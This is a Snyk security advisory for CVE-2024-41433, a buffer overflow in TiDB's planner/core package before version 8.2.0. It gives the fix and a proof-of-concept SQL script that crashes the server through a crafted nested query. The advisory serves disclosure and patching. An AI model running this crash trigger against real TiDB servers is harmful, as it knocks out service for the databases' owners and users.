Buffer Overflow Affecting github.com/pingcap/tidb/pkg/planner/core package, versions <8.2.0


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.04% (11th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-GOLANG-GITHUBCOMPINGCAPTIDBPKGPLANNERCORE-7888177
  • published4 Sept 2024
  • disclosed3 Sept 2024
  • creditr33s3n6

Introduced: 3 Sep 2024

CVE-2024-41433  (opens in a new tab)
CWE-120  (opens in a new tab)

How to fix?

Upgrade github.com/pingcap/tidb/pkg/planner/core to version 8.2.0 or higher.

Overview

Affected versions of this package are vulnerable to Buffer Overflow via the component expression.ExplainExpressionList. An attacker can disrupt service by sending specially crafted input.

PoC

create table t_ldpj7bp ( 
c_w_jr14qm2 int ,
c_t3nd927 int ,
c_ts int ,
c_s text ,
c_qchmg double ,
c_r int ,
c_olb3fsg6 text ,
c_zkbe tinyint ,
primary key(c_w_jr14qm2) NONCLUSTERED) shard_row_id_bits=8 pre_split_regions=5;

-- sql #267
alter table t_ldpj7bp set tiflash replica 1;

insert into t_ldpj7bp (c_w_jr14qm2, c_t3nd927, c_ts, c_s, c_qchmg, c_r, c_olb3fsg6, c_zkbe) values 
  (730552758, -682774206, 1698439632, 'lrvil359', 18446744073709551616.5, cast(cast(null as signed) as signed), 'oj1', (-1367510804 in (
    2123597870, 1485484027))), 
  (-1001332962, -1396443960, cast(cast(null as signed) as signed), 'e43lh', 15.54, -1568307927, 'i', (-1162033997 not in (
    -1850570375, -781179836, -1281662147, -431391092, cast(null as signed)))), 
  (-727295464, 1998529670, -1873237194, 'lps56o', 70.81, 1380690610, cast(null as char), ((NOT NOT(cast( (cast(cast(null as signed) as signed) && cast(2536017375093623800 as signed)) as unsigned)))) 
    and ((NOT NOT(cast( (cast(2051320819 as signed) <=> cast(-8632453786780487783 as signed)) as unsigned))))), 
  (2133408768, 736339957, -1486317339, 'f', 62.97, -1444096406, 'tj', (NOT NOT(cast( (cast(cast(null as char) as char) = cast(cast(null as char) as char)) as unsigned))));

-- [[NOTE]] please wait a while before executing the following sql, otherwise the bug may not be triggered.
SELECT
  ref_0.c_t3nd927 as c2
FROM
  t_ldpj7bp as ref_0
WHERE
  (EXISTS (
  select distinct 
      cast(cast(null as signed) as signed) as c0
    from 
      (select  
            ref_1.c_w_jr14qm2 as c0, 
            ref_1.c_ts as c1
          from 
            t_ldpj7bp as ref_1
          where (NOT NOT(cast( (cast(2147483648.100000 as double) || cast(78.5 as double)) as unsigned)))) as subq_0
    where (NOT NOT(cast( (cast(ref_0.c_t3nd927 as signed) <> cast(-2308981195293685378 as signed)) as unsigned)))
    order by c0 desc))
ORDER BY
  c2 ASC
LIMIT 55;

CVSS Scores

version 4.0
version 3.1